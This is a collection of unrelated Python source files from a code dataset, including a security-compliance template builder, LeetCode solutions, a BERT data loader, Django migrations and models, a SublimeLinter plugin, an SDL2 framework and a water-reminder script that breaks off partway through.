@template(["anaconda", "oval"])
def mount(data, lang):
data["pointid"] = re.sub(r'[-\./]', '_', data["mountpoint"])
return data
def _mount_option(data, lang):
if lang == "oval":
data["pointid"] = re.sub(r"[-\./]", "_", data["mountpoint"]).lstrip("_")
else:
data["mountoption"] = re.sub(" ", ",", data["mountoption"])
return data
@template(["anaconda", "ansible", "bash", "oval"])
def mount_option(data, lang):
return _mount_option(data, lang)
@template(["ansible", "bash", "oval"])
def mount_option_remote_filesystems(data, lang):
if lang == "oval":
data["mountoptionid"] = sanitize_input(data["mountoption"])
return _mount_option(data, lang)
@template(["anaconda", "ansible", "bash", "oval"])
def mount_option_removable_partitions(data, lang):
return _mount_option(data, lang)
@template(["anaconda", "ansible", "bash", "oval", "puppet"])
def package_installed(data, lang):
if "evr" in data:
evr = data["evr"]
if evr and not re.match(r'\d:\d[\d\w+.]*-\d[\d\w+.]*', evr, 0):
raise RuntimeError(
"ERROR: input violation: evr key should be in "
"epoch:version-release format, but package {0} has set "
"evr to {1}".format(data["pkgname"], evr))
return data
@template(["ansible", "bash", "oval"])
def sysctl(data, lang):
data["sysctlid"] = re.sub(r'[-\.]', '_', data["sysctlvar"])
if not data.get("sysctlval"):
data["sysctlval"] = ""
ipv6_flag = "P"
if data["sysctlid"].find("ipv6") >= 0:
ipv6_flag = "I"
data["flags"] = "SR" + ipv6_flag
return data
@template(["anaconda", "ansible", "bash", "oval", "puppet"])
def package_removed(data, lang):
return data
@template(["ansible", "bash", "oval"])
def sebool(data, lang):
sebool_bool = data.get("sebool_bool", None)
if sebool_bool is not None and sebool_bool not in ["true", "false"]:
raise ValueError(
"ERROR: key sebool_bool in rule {0} contains forbidden "
"value '{1}'.".format(data["_rule_id"], sebool_bool)
)
return data
@template(["ansible", "bash", "oval", "puppet"])
def service_disabled(data, lang):
if "packagename" not in data:
data["packagename"] = data["servicename"]
if "daemonname" not in data:
data["daemonname"] = data["servicename"]
if "mask_service" not in data:
data["mask_service"] = "true"
return data
@template(["ansible", "bash", "oval", "puppet"])
def service_enabled(data, lang):
if "packagename" not in data:
data["packagename"] = data["servicename"]
if "daemonname" not in data:
data["daemonname"] = data["servicename"]
return data
@template(["ansible", "bash", "oval"])
def sshd_lineinfile(data, lang):
missing_parameter_pass = data["missing_parameter_pass"]
if missing_parameter_pass == "true":
missing_parameter_pass = True
elif missing_parameter_pass == "false":
missing_parameter_pass = False
data["missing_parameter_pass"] = missing_parameter_pass
return data
@template(["ansible", "bash", "oval"])
def shell_lineinfile(data, lang):
value = data["value"]
if value[0] in ("'", '"') and value[0] == value[-1]:
msg = (
"Value >>{value}<< of shell variable '{varname}' "
"has been supplied with quotes, please fix the content - "
"shell quoting is handled by the check/remediation code."
.format(value=value, varname=data["parameter"]))
raise Exception(msg)
missing_parameter_pass = data.get("missing_parameter_pass", "false")
if missing_parameter_pass == "true":
missing_parameter_pass = True
elif missing_parameter_pass == "false":
missing_parameter_pass = False
data["missing_parameter_pass"] = missing_parameter_pass
no_quotes = False
if data["no_quotes"] == "true":
no_quotes = True
data["no_quotes"] = no_quotes
return data
@template(["ansible", "bash", "oval"])
def timer_enabled(data, lang):
if "packagename" not in data:
data["packagename"] = data["timername"]
return data
class Builder(object):
"""
Class for building all templated content for a given product.
To generate content from templates, pass the env_yaml, path to the
directory with resolved rule YAMLs, path to the directory that contains
templates, path to the output directory for checks and a path to the
output directory for remediations into the constructor. Then, call the
method build() to perform a build.
"""
def __init__(
self, env_yaml, resolved_rules_dir, templates_dir,
remediations_dir, checks_dir):
self.env_yaml = env_yaml
self.resolved_rules_dir = resolved_rules_dir
self.templates_dir = templates_dir
self.remediations_dir = remediations_dir
self.checks_dir = checks_dir
self.output_dirs = dict()
for lang in languages:
if lang == "oval":
# OVAL checks need to be put to a different directory because
# they are processed differently than remediations later in the
# build process
output_dir = self.checks_dir
else:
output_dir = self.remediations_dir
dir_ = os.path.join(output_dir, lang)
self.output_dirs[lang] = dir_
def preprocess_data(self, template, lang, raw_parameters):
"""
Processes template data using a callback before the data will be
substituted into the Jinja template.
"""
template_func = templates[template]
parameters = template_func(raw_parameters.copy(), lang)
# TODO: Remove this right after the variables in templates are renamed
# to lowercase
uppercases = dict()
for k, v in parameters.items():
uppercases[k.upper()] = v
return uppercases
def build_lang(
self, rule_id, template_name, template_vars, lang, local_env_yaml):
"""
Builds templated content for a given rule for a given language.
Writes the output to the correct build directories.
"""
template_func = templates[template_name]
if lang not in template_func.langs:
return
template_file_name = "template_{0}_{1}".format(
lang.upper(), template_name)
template_file_path = os.path.join(
self.templates_dir, template_file_name)
if not os.path.exists(template_file_path):
raise RuntimeError(
"Rule {0} wants to generate {1} content from template {2}, "
"but file {3} which provides this template does not "
"exist.".format(
rule_id, lang, template_name, template_file_path)
)
ext = lang_to_ext_map[lang]
output_file_name = rule_id + ext
output_filepath = os.path.join(
self.output_dirs[lang], output_file_name)
template_parameters = self.preprocess_data(
template_name, lang, template_vars)
jinja_dict = ssg.utils.merge_dicts(local_env_yaml, template_parameters)
filled_template = ssg.jinja.process_file_with_macros(
template_file_path, jinja_dict)
with open(output_filepath, "w") as f:
f.write(filled_template)
def get_langs_to_generate(self, rule):
"""
For a given rule returns list of languages that should be generated
from templates. This is controlled by "template_backends" in rule.yml.
"""
if "backends" in rule.template:
backends = rule.template["backends"]
for lang in backends:
if lang not in languages:
raise RuntimeError(
"Rule {0} wants to generate unknown language '{1}"
"from a template.".format(rule.id_, lang)
)
langs_to_generate = []
for lang in languages:
backend = backends.get(lang, "on")
if backend == "on":
langs_to_generate.append(lang)
return langs_to_generate
else:
return languages
def build_rule(self, rule_id, rule_title, template, langs_to_generate):
"""
Builds templated content for a given rule for selected languages,
writing the output to the correct build directories.
"""
try:
template_name = template["name"]
except KeyError:
raise ValueError(
"Rule {0} is missing template name under template key".format(
rule_id))
if template_name not in templates:
raise ValueError(
"Rule {0} uses template {1} which does not exist.".format(
rule_id, template_name))
try:
template_vars = template["vars"]
except KeyError:
raise ValueError(
"Rule {0} does not contain mandatory 'vars:' key under "
"'template:' key.".format(rule_id))
# Add the rule ID which will be reused in OVAL templates as OVAL
# definition ID so that the build system matches the generated
# check with the rule.
template_vars["_rule_id"] = rule_id
# checks and remediations are processed with a custom YAML dict
local_env_yaml = self.env_yaml.copy()
local_env_yaml["rule_id"] = rule_id
local_env_yaml["rule_title"] = rule_title
local_env_yaml["products"] = self.env_yaml["product"]
for lang in langs_to_generate:
self.build_lang(
rule_id, template_name, template_vars, lang, local_env_yaml)
def build_extra_ovals(self):
declaration_path = os.path.join(self.templates_dir, "extra_ovals.yml")
declaration = ssg.yaml.open_raw(declaration_path)
for oval_def_id, template in declaration.items():
langs_to_generate = ["oval"]
# Since OVAL definition ID in shorthand format is always the same
# as rule ID, we can use it instead of the rule ID even if no rule
# with that ID exists
self.build_rule(
oval_def_id, oval_def_id, template, langs_to_generate)
def build_all_rules(self):
for rule_file in os.listdir(self.resolved_rules_dir):
rule_path = os.path.join(self.resolved_rules_dir, rule_file)
try:
rule = ssg.build_yaml.Rule.from_yaml(rule_path, self.env_yaml)
except ssg.build_yaml.DocumentationNotComplete:
# Happens on non-debug build when a rule is "documentation-incomplete"
continue
if rule.template is None:
# rule is not templated, skipping
continue
langs_to_generate = self.get_langs_to_generate(rule)
self.build_rule(
rule.id_, rule.title, rule.template, langs_to_generate)
def build(self):
"""
Builds all templated content for all languages, writing
the output to the correct build directories.
"""
for dir_ in self.output_dirs.values():
if not os.path.exists(dir_):
os.makedirs(dir_)
self.build_extra_ovals()
self.build_all_rules()
|
StarcoderdataPython
|
3454519
|
<gh_stars>1-10
#%%
"""
- Find the Difference
- https://leetcode.com/problems/find-the-difference/
- Easy
Given two strings s and t which consist of only lowercase letters.
String t is generated by random shuffling string s and then add one more letter at a random position.
Find the letter that was added in t.
Example:
Input:
s = "abcd"
t = "abcde"
Output:
e
Explanation:
'e' is the letter that was added.
"""
#%%
##
class S1:
def findTheDifference(self, s, t):
"""
:type s: str
:type t: str
:rtype: str
"""
m = sorted(s)
n = sorted(t)
for i in range(len(m)):
if m[i] != n[i]:
return n[i]
return n[-1]
#%%
class S2:
def findTheDifference(self, s, t):
res = {}
for i in s:
res[i] = res.get(i,0) + 1
for j in t:
res[j] = res.get(j,0) - 1
for key in res:
if abs(res[key]) == 1:
return key
#%%
class S3:
def findTheDifference(self, s, t):
from collections import Counter
return list((Counter(t) - Counter(s)).keys()).pop()
|
StarcoderdataPython
|
3546252
|
<filename>lib/tf_colormap.py
import numpy as np
import tensorflow as tf
import matplotlib.cm
def tf_cmap_nearest(data, map, min_val=0., max_val=1.):
map = matplotlib.cm.get_cmap(map).colors
map = tf.constant(map, dtype=tf.float32)
data = tf.clip_by_value(data, min_val, max_val)
#normalize to [0,1]
data = (data - min_val) / (max_val - min_val)
#quantize
data *= map.get_shape().as_list()[0]-1
data = tf.cast(data, dtype=tf.int32)
#map
return tf.reduce_mean(tf.gather(map, data), axis=-2)
|
StarcoderdataPython
|
3221525
|
"""Data loader"""
import os
import torch
import utils
import random
import numpy as np
from transformers import BertTokenizer
class DataLoader(object):
def __init__(self, data_dir, bert_class, params, token_pad_idx=0, tag_pad_idx=-1):
self.data_dir = data_dir
self.batch_size = params.batch_size
self.max_len = params.max_len
self.device = params.device
self.seed = params.seed
self.token_pad_idx = token_pad_idx
self.tag_pad_idx = tag_pad_idx
tags = self.load_tags()
self.tag2idx = {tag: idx for idx, tag in enumerate(tags)}
self.idx2tag = {idx: tag for idx, tag in enumerate(tags)}
params.tag2idx = self.tag2idx
params.idx2tag = self.idx2tag
self.tokenizer = BertTokenizer.from_pretrained(bert_class, do_lower_case=False)
def load_tags(self):
tags = []
file_path = os.path.join(self.data_dir, 'tags.txt')
with open(file_path, 'r') as file:
for tag in file:
tags.append(tag.strip())
return tags
def load_sentences_tags(self, sentences_file, tags_file, d):
"""Loads sentences and tags from their corresponding files.
Maps tokens and tags to their indices and stores them in the provided dict d.
"""
sentences = []
tags = []
with open(sentences_file, 'r') as file:
for line in file:
# replace each token by its index
tokens = line.strip().split(' ')
subwords = list(map(self.tokenizer.tokenize, tokens))
subword_lengths = list(map(len, subwords))
subwords = ['CLS'] + [item for indices in subwords for item in indices]
token_start_idxs = 1 + np.cumsum([0] + subword_lengths[:-1])
sentences.append((self.tokenizer.convert_tokens_to_ids(subwords),token_start_idxs))
if tags_file != None:
with open(tags_file, 'r') as file:
for line in file:
# replace each tag by its index
tag_seq = [self.tag2idx.get(tag) for tag in line.strip().split(' ')]
tags.append(tag_seq)
# checks to ensure there is a tag for each token
assert len(sentences) == len(tags)
for i in range(len(sentences)):
assert len(tags[i]) == len(sentences[i][-1])
d['tags'] = tags
# storing sentences and tags in dict d
d['data'] = sentences
d['size'] = len(sentences)
def load_data(self, data_type):
"""Loads the data for each type in types from data_dir.
Args:
data_type: (str) has one of 'train', 'val', 'test' depending on which data is required.
Returns:
data: (dict) contains the data with tags for each type in types.
"""
data = {}
if data_type in ['train', 'val', 'test']:
print('Loading ' + data_type)
sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt')
tags_path = os.path.join(self.data_dir, data_type, 'tags.txt')
self.load_sentences_tags(sentences_file, tags_path, data)
elif data_type == 'interactive':
sentences_file = os.path.join(self.data_dir, data_type, 'sentences.txt')
self.load_sentences_tags(sentences_file, tags_file=None, d=data)
else:
raise ValueError("data type not in ['train', 'val', 'test']")
return data
def data_iterator(self, data, shuffle=False):
"""Returns a generator that yields batches data with tags.
Args:
data: (dict) contains data which has keys 'data', 'tags' and 'size'
shuffle: (bool) whether the data should be shuffled
Yields:
batch_data: (tensor) shape: (batch_size, max_len)
batch_tags: (tensor) shape: (batch_size, max_len)
"""
# make a list that decides the order in which we go over the data- this avoids explicit shuffling of data
order = list(range(data['size']))
if shuffle:
random.seed(self.seed)
random.shuffle(order)
interMode = False if 'tags' in data else True
if data['size'] % self.batch_size == 0:
BATCH_NUM = data['size']//self.batch_size
else:
BATCH_NUM = data['size']//self.batch_size + 1
# one pass over data
for i in range(BATCH_NUM):
# fetch sentences and tags
if i * self.batch_size < data['size'] < (i+1) * self.batch_size:
sentences = [data['data'][idx] for idx in order[i*self.batch_size:]]
if not interMode:
tags = [data['tags'][idx] for idx in order[i*self.batch_size:]]
else:
sentences = [data['data'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]]
if not interMode:
tags = [data['tags'][idx] for idx in order[i*self.batch_size:(i+1)*self.batch_size]]
# batch length
batch_len = len(sentences)
# compute length of longest sentence in batch
batch_max_subwords_len = max([len(s[0]) for s in sentences])
max_subwords_len = min(batch_max_subwords_len, self.max_len)
max_token_len = 0
# prepare a numpy array with the data, initialising the data with pad_idx
batch_data = self.token_pad_idx * np.ones((batch_len, max_subwords_len))
batch_token_starts = []
# copy the data to the numpy array
for j in range(batch_len):
cur_subwords_len = len(sentences[j][0])
if cur_subwords_len <= max_subwords_len:
batch_data[j][:cur_subwords_len] = sentences[j][0]
else:
batch_data[j] = sentences[j][0][:max_subwords_len]
token_start_idx = sentences[j][-1]
token_starts = np.zeros(max_subwords_len)
token_starts[[idx for idx in token_start_idx if idx < max_subwords_len]] = 1
batch_token_starts.append(token_starts)
max_token_len = max(int(sum(token_starts)), max_token_len)
if not interMode:
batch_tags = self.tag_pad_idx * np.ones((batch_len, max_token_len))
for j in range(batch_len):
cur_tags_len = len(tags[j])
if cur_tags_len <= max_token_len:
batch_tags[j][:cur_tags_len] = tags[j]
else:
batch_tags[j] = tags[j][:max_token_len]
# since all data are indices, we convert them to torch LongTensors
batch_data = torch.tensor(batch_data, dtype=torch.long)
batch_token_starts = torch.tensor(batch_token_starts, dtype=torch.long)
if not interMode:
batch_tags = torch.tensor(batch_tags, dtype=torch.long)
# shift tensors to GPU if available
batch_data, batch_token_starts = batch_data.to(self.device), batch_token_starts.to(self.device)
if not interMode:
batch_tags = batch_tags.to(self.device)
yield batch_data, batch_token_starts, batch_tags
else:
yield batch_data, batch_token_starts
|
StarcoderdataPython
|
5074583
|
# Generated by Django 2.2 on 2020-02-18 15:36
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import resource_inventory.models
def clear_resource_bundles(apps, schema_editor):
ResourceBundle = apps.get_model('resource_inventory', 'ResourceBundle')
for rb in ResourceBundle.objects.all():
rb.template = None
rb.save()
def create_default_template(apps, schema_editor):
ResourceTemplate = apps.get_model('resource_inventory', 'ResourceTemplate')
ResourceTemplate.objects.create(name="Default Template", hidden=True)
def populate_servers(apps, schema_editor):
"""Convert old Host models to Server Resources."""
Host = apps.get_model('resource_inventory', 'Host')
Server = apps.get_model('resource_inventory', 'Server')
ResourceProfile = apps.get_model('resource_inventory', 'ResourceProfile')
for h in Host.objects.all():
rp = ResourceProfile.objects.get(id=h.profile.id)
server = Server.objects.create(
working=h.working,
vendor=h.vendor,
labid=h.labid,
booked=h.booked,
name=h.labid,
lab=h.lab,
profile=rp
)
for iface in h.interfaces.all():
server.interfaces.add(iface)
def populate_resource_templates(apps, schema_editor):
"""
Convert old GenericResourceBundles to ResourceTemplate.
This will be kept blank for now. If, during testing, we realize
we want to implement this, we will. For now, it seems
fine to let the old models just die and create
new ones as needed.
"""
pass
def populate_resource_profiles(apps, schema_editor):
"""
Convert old HostProfile models to ResourceProfiles.
Also updates all the foreign keys pointed to the old
host profile. This change was basically only a name change.
"""
HostProfile = apps.get_model('resource_inventory', 'HostProfile')
ResourceProfile = apps.get_model('resource_inventory', 'ResourceProfile')
for hp in HostProfile.objects.all():
rp = ResourceProfile.objects.create(id=hp.id, name=hp.name, description=hp.description)
rp.labs.add(*list(hp.labs.all()))
"""
TODO: link these models together
rp.interfaceprofile = hp.interfaceprofile
rp.storageprofile = hp.storageprofile
rp.cpuprofile = hp.cpuprofile
rp.ramprofile = hp.ramprofile
rp.save()
hp.interfaceprofile.host = rp
rp.storageprofile.host = rp
rp.cpuprofile.host = rp
rp.ramprofile.host = rp
rp.interfaceprofile.save()
rp.storageprofile.save()
rp.cpuprofile.save()
rp.ramprofile.save()
"""
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('booking', '0007_remove_booking_config_bundle'),
('account', '0004_downtime'),
('api', '0013_manual_20200218_1536'),
('resource_inventory', '0012_manual_20200218_1536'),
]
operations = [
migrations.CreateModel(
name='InterfaceConfiguration',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('connections', models.ManyToManyField(to='resource_inventory.NetworkConnection')),
],
),
migrations.CreateModel(
name='ResourceConfiguration',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('is_head_node', models.BooleanField(default=False)),
],
),
migrations.CreateModel(
name='ResourceOPNFVConfig',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='ResourceProfile',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=200, unique=True)),
('description', models.TextField()),
('labs', models.ManyToManyField(related_name='resourceprofiles', to='account.Lab')),
],
),
migrations.RunPython(populate_resource_profiles),
migrations.CreateModel(
name='ResourceTemplate',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=300, unique=True)),
('xml', models.TextField()),
('description', models.CharField(default='', max_length=1000)),
('public', models.BooleanField(default=False)),
('hidden', models.BooleanField(default=False)),
('lab', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='resourcetemplates', to='account.Lab')),
('owner', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
migrations.RunPython(populate_resource_templates),
migrations.CreateModel(
name='Server',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('working', models.BooleanField(default=True)),
('vendor', models.CharField(default='unknown', max_length=100)),
('model', models.CharField(default='unknown', max_length=150)),
('labid', models.CharField(default='default_id', max_length=200, unique=True)),
('booked', models.BooleanField(default=False)),
('name', models.CharField(max_length=200, unique=True)),
],
options={
'abstract': False,
},
),
migrations.AddField(
model_name='server',
name='bundle',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.ResourceBundle'),
),
migrations.AddField(
model_name='server',
name='config',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.ResourceConfiguration'),
),
migrations.AddField(
model_name='server',
name='interfaces',
field=models.ManyToManyField(to='resource_inventory.Interface'),
),
migrations.AddField(
model_name='server',
name='lab',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='account.Lab'),
),
migrations.AddField(
model_name='server',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.ResourceProfile'),
),
migrations.AddField(
model_name='server',
name='remote_management',
field=models.ForeignKey(default=resource_inventory.models.get_default_remote_info, on_delete=models.SET(resource_inventory.models.get_default_remote_info), to='resource_inventory.RemoteInfo'),
),
migrations.RunPython(populate_servers),
migrations.RemoveField(
model_name='generichost',
name='profile',
),
migrations.RemoveField(
model_name='generichost',
name='resource',
),
migrations.RemoveField(
model_name='genericinterface',
name='connections',
),
migrations.RemoveField(
model_name='genericinterface',
name='host',
),
migrations.RemoveField(
model_name='genericinterface',
name='profile',
),
migrations.RemoveField(
model_name='genericresource',
name='bundle',
),
migrations.RemoveField(
model_name='genericresourcebundle',
name='lab',
),
migrations.RemoveField(
model_name='genericresourcebundle',
name='owner',
),
migrations.RemoveField(
model_name='host',
name='bundle',
),
migrations.RemoveField(
model_name='host',
name='config',
),
migrations.RemoveField(
model_name='host',
name='lab',
),
migrations.RemoveField(
model_name='host',
name='profile',
),
migrations.RemoveField(
model_name='host',
name='remote_management',
),
migrations.RemoveField(
model_name='host',
name='template',
),
migrations.RemoveField(
model_name='hostconfiguration',
name='bundle',
),
migrations.RemoveField(
model_name='hostconfiguration',
name='host',
),
migrations.RemoveField(
model_name='hostconfiguration',
name='image',
),
migrations.RemoveField(
model_name='hostopnfvconfig',
name='host_config',
),
migrations.RemoveField(
model_name='hostopnfvconfig',
name='opnfv_config',
),
migrations.RemoveField(
model_name='hostopnfvconfig',
name='role',
),
migrations.RemoveField(
model_name='hostprofile',
name='labs',
),
migrations.RemoveField(
model_name='interface',
name='host',
),
migrations.RemoveField(
model_name='interface',
name='name',
),
migrations.RemoveField(
model_name='opnfvconfig',
name='bundle',
),
migrations.AddField(
model_name='interface',
name='profile',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.InterfaceProfile'),
preserve_default=False,
),
migrations.AddField(
model_name='interfaceprofile',
name='order',
field=models.IntegerField(default=-1),
),
migrations.AlterField(
model_name='cpuprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cpuprofile', to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='diskprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='storageprofile', to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='image',
name='host_type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='interfaceprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interfaceprofile', to='resource_inventory.ResourceProfile'),
),
migrations.AlterField(
model_name='network',
name='bundle',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='networks', to='resource_inventory.ResourceTemplate'),
),
migrations.AlterField(
model_name='ramprofile',
name='host',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='ramprofile', to='resource_inventory.ResourceProfile'),
),
migrations.RunPython(clear_resource_bundles),
migrations.AlterField(
model_name='resourcebundle',
name='template',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.ResourceTemplate'),
),
migrations.DeleteModel(
name='ConfigBundle',
),
migrations.DeleteModel(
name='GenericHost',
),
migrations.DeleteModel(
name='GenericInterface',
),
migrations.DeleteModel(
name='GenericResource',
),
migrations.DeleteModel(
name='GenericResourceBundle',
),
migrations.DeleteModel(
name='HostConfiguration',
),
migrations.DeleteModel(
name='HostOPNFVConfig',
),
migrations.DeleteModel(
name='HostProfile',
),
migrations.DeleteModel(
name='Host',
),
migrations.AddField(
model_name='resourceopnfvconfig',
name='opnfv_config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_opnfv_config', to='resource_inventory.OPNFVConfig'),
),
migrations.AddField(
model_name='resourceopnfvconfig',
name='resource_config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_opnfv_config', to='resource_inventory.ResourceConfiguration'),
),
migrations.AddField(
model_name='resourceopnfvconfig',
name='role',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='resource_opnfv_configs', to='resource_inventory.OPNFVRole'),
),
migrations.AddField(
model_name='resourceconfiguration',
name='image',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, to='resource_inventory.Image'),
),
migrations.AddField(
model_name='resourceconfiguration',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.ResourceProfile'),
),
migrations.AddField(
model_name='resourceconfiguration',
name='template',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='resourceConfigurations', to='resource_inventory.ResourceTemplate'),
),
migrations.AddField(
model_name='interfaceconfiguration',
name='profile',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='resource_inventory.InterfaceProfile'),
),
migrations.AddField(
model_name='interfaceconfiguration',
name='resource_config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='interface_configs', to='resource_inventory.ResourceConfiguration'),
),
migrations.AddField(
model_name='interface',
name='acts_as',
field=models.OneToOneField(null=True, on_delete=django.db.models.deletion.SET_NULL, to='resource_inventory.InterfaceConfiguration'),
),
migrations.RunPython(create_default_template),
migrations.AddField(
model_name='opnfvconfig',
name='template',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, related_name='opnfv_config', to='resource_inventory.ResourceTemplate'),
preserve_default=False,
),
]
|
StarcoderdataPython
|
4916378
|
#
# linter.py
# Linter for SublimeLinter3, a code checking framework for Sublime Text 3
#
# Written by roadhump
# Copyright (c) 2014 roadhump
#
# License: MIT
#
"""This module exports the Ember Template Linter plugin class."""
import json
import logging
import os
import re
from SublimeLinter.lint import NodeLinter
logger = logging.getLogger('SublimeLinter.plugin.embertemplatelint')
class EmberTemplateLint(NodeLinter):
"""Provides an interface to the ember template linter executable."""
cmd = 'ember-template-lint ${file}'
missing_config_regex = re.compile(
r'^(.*?)\r?\n\w*(Ember template linter couldn\'t find a configuration file.)',
re.DOTALL
)
regex = (
r'.+?'
r'(?P<line>\d+):(?P<col>\d+)'
r'\s+('
r'(?P<error>error)'
r'|'
r'(?P<warning>warining)'
r')\s+'
r'(?P<message>.*)'
r'\s+'
r'(?P<ruleId>.*)'
)
line_col_base = (1, 0)
defaults = {
'selector': 'text.html.handlebars'
}
def on_stderr(self, stderr):
# Demote 'annoying' config is missing error to a warning.
if self.missing_config_regex.match(stderr):
logger.warning(stderr)
self.notify_failure()
elif (
'DeprecationWarning' in stderr or
'ExperimentalWarning' in stderr or
'in the next version' in stderr # is that a proper deprecation?
):
logger.warning(stderr)
else:
logger.error(stderr)
self.notify_failure()
def split_match(self, match):
match, line, col, error, warning, message, near = super().split_match(match)
ruleId = match.group("ruleId")
return match, line, col, ruleId if error is not None else error, ruleId if warning is not None else warning, message, None
|
StarcoderdataPython
|
1835940
|
<reponame>dmsgago/ree<gh_stars>0
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class Empresas(models.Model):
cif = models.CharField(max_length=9, blank=True, primary_key=True)
nombre = models.CharField(max_length=25, blank=True)
def __str__(self):
return self.nombre
class Provincias(models.Model):
codigo = models.CharField(max_length=2, blank=True, primary_key=True)
nombre = models.CharField(max_length=30)
def __str__(self):
return self.nombre
class Centrales(models.Model):
nombre = models.CharField(max_length=25, blank=True, primary_key=True)
codigo_provincia = models.ForeignKey(Provincias, on_delete=models.CASCADE)
cif_empresa = models.ForeignKey(Empresas, on_delete=models.CASCADE)
direccion = models.CharField(max_length=110)
telefono = models.CharField(max_length=9)
def __str__(self):
return self.nombre
|
StarcoderdataPython
|
6539106
|
<filename>src/app/models/employee.py
from datetime import datetime
from typing import Optional
from pydantic import BaseModel
class Employee(BaseModel):
id: int
first_name: str
second_name: str
date_of_birth: datetime
gender: bool
email: str
salary: int
position: str
hired_on: datetime
# TODO: add location
reports_to: Optional[int] = None
|
StarcoderdataPython
|
3249066
|
<reponame>xtreme3d/xtreme3d
import time
import ctypes
import sdl2
from keycodes import *
def windowHandle(sdlwnd):
info = sdl2.SDL_SysWMinfo()
sdl2.SDL_GetWindowWMInfo(sdlwnd, ctypes.byref(info))
return info.info.win.window
def textRead(filename):
f = open(filename, 'r')
return f.read()
class Framework:
windowWidth = 640
windowHeight = 480
window = None
keyPressed = [False] * 512
mouseButtonPressed = [False] * 255
mouseX = 0
mouseY = 0
halfWindowWidth = 0
halfWindowHeight = 0
running = True
fixedTimeStep = 1.0 / 60.0
timer = 0
lastTime = 0
def __init__(self, w, h, title):
self.windowWidth = w
self.windowHeight = h
self.windowTitle = title
self.halfWindowWidth = self.windowWidth / 2
self.halfWindowHeight = self.windowHeight / 2
sdl2.SDL_Init(sdl2.SDL_INIT_VIDEO)
self.window = sdl2.SDL_CreateWindow(self.windowTitle,
sdl2.SDL_WINDOWPOS_CENTERED,
sdl2.SDL_WINDOWPOS_CENTERED,
self.windowWidth, self.windowHeight,
sdl2.SDL_WINDOW_SHOWN)
sdl2.SDL_WarpMouseInWindow(self.window, self.halfWindowWidth, self.halfWindowHeight)
sdl2.SDL_ShowCursor(0)
self.start()
def start(self):
pass
def update(self, dt):
pass
def render(self):
pass
def onKeyDown(self, key):
pass
def onKeyUp(self, key):
pass
def onMouseButtonDown(self, button):
pass
def onMouseButtonUp(self, button):
pass
def setMouse(self, x, y):
sdl2.SDL_WarpMouseInWindow(self.window, x, y)
def setMouseToCenter(self):
self.setMouse(self.halfWindowWidth, self.halfWindowHeight)
def run(self):
event = sdl2.SDL_Event()
while self.running:
while sdl2.SDL_PollEvent(ctypes.byref(event)) != 0:
if event.type == sdl2.SDL_QUIT:
self.running = False
elif event.type == sdl2.SDL_KEYDOWN:
self.keyPressed[event.key.keysym.scancode] = True
self.onKeyDown(event.key.keysym.scancode)
elif event.type == sdl2.SDL_KEYUP:
self.keyPressed[event.key.keysym.scancode] = False
self.onKeyUp(event.key.keysym.scancode)
elif event.type == sdl2.SDL_MOUSEBUTTONDOWN:
self.mouseButtonPressed[event.button.button] = True
self.onMouseButtonDown(event.button.button)
elif event.type == sdl2.SDL_MOUSEBUTTONUP:
self.mouseButtonPressed[event.button.button] = False
self.onMouseButtonUp(event.button.button)
elif event.type == sdl2.SDL_MOUSEMOTION:
self.mouseX = event.motion.x
self.mouseY = event.motion.y
self.currentTime = sdl2.SDL_GetTicks()
elapsedTime = self.currentTime - self.lastTime
self.lastTime = self.currentTime
dt = elapsedTime * 0.001
self.timer += dt
if (self.timer >= self.fixedTimeStep):
self.timer -= self.fixedTimeStep
self.update(self.fixedTimeStep)
self.render()
sdl2.SDL_DestroyWindow(self.window)
sdl2.SDL_Quit()
|
StarcoderdataPython
|
3457509
|
import time
from plyer import notification
if __name__ == "__main__":
while True:
notification.notify(
title = "DRINK WATER !!",
message = "Just a gentle reminder for you - You need to drink water right now.",
